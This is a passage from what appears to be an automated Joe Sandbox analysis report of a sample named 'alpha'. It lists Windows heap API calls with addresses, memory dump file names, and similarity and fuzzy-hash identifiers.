                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF71966B4DB), ref: 00007FF7196706D6
                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF71966B4DB), ref: 00007FF7196706F0
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF71966B4DB), ref: 00007FF71967074D
                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF71966B4DB), ref: 00007FF719670762
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcess
                                                                    • String ID:
                                                                    • API String ID: 1617791916-0
                                                                    • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                    • Instruction ID: 02bf7041f20e24eae75849f9e79055f0163c80a30c049b95732faef6ebc930d3
                                                                    • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                    • Instruction Fuzzy Hash: BA415C76A0AB4286EA18AF10E45017DF7B2FF85BA8B948535CA4E07750DF3CE44AC770